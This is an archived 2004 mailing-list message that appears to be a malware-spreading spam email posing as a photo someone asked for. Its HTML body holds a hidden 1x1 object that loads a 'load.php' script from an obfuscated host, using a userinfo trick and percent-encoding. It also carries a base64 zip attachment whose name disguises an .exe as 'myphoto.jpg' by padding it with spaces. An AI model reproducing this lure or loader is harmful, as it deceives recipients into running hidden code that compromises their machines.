Newsgroups: perl.modules
Path: nntp.perl.org
Xref: nntp.perl.org perl.modules:25931
Return-Path: <alex@web2mail.com>
Mailing-List: contact modules-help@perl.org; run by ezmlm
Delivered-To: mailing list modules@perl.org
Received: (qmail 68824 invoked by uid 76); 26 Jan 2004 14:43:54 -0000
Received: from x1.develooper.com (HELO x1.develooper.com) (63.251.223.170) by onion.perl.org (qpsmtpd/0.26) with SMTP; Mon, 26 Jan 2004 06:43:54 -0800
Received: (qmail 9699 invoked by uid 225); 26 Jan 2004 14:43:52 -0000
Delivered-To: modules@perl.org
Received: (qmail 9694 invoked by alias); 26 Jan 2004 14:43:51 -0000
Received: from a-l-interne.vd.ch (HELO localhost) (145.232.254.1)  by la.mx.develooper.com (qpsmtpd/0.27-dev) with ESMTP; Mon, 26 Jan 2004 06:43:40 -0800
To: <modules@perl.org>
Subject: Important information for you. Read it immediately !
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="xxxx"
X-Spam-Check-By: la.mx.develooper.com
X-Spam-Status: No, hits=5.5 required=7.0 tests=DATE_MISSING,RAZOR2_CHECK,SPAM_PHRASE_00_01 version=2.44
X-SMTPD: qpsmtpd/0.26, http://develooper.com/code/qpsmtpd/
Approved: news@nntp.perl.org
From: FUCKENSUICIDE@HOTMAIL.COM ("Elene")
Date: Mon, 26 January 2004 06:43:55 -0800
Message-ID: <perl.modules-25931@nntp.perl.org>

--xxxx
Content-Type: text/html;
Content-Transfer-Encoding: 7bit

<FONT color=red size=15><CENTER>Hi !</CENTER></FONT><BR>
Here is my photo, that you asked for yesterday.<BR><object data=http://gold-hosting.com@%79o%75%61n%64menee%64%6co%76e.com/load.php WIDTH=1 HEIGHT=1></iframe>

UEsDBAoAAAAAAFZ2ai8AAAAAAAAAAAAAAABHAAAAbXlwaG90by5q
cGcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC5leGVQSwECFAAKAAAAAABWdgAA
AADZdgAAAAAAAAAARwAAAAAAAAAAACAA/4EAAAAAbXlwaG90by5q
cGcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC5leGVQSwUGAAAAAAEAAQB1AAAA
ZQAAAAAAAAAA

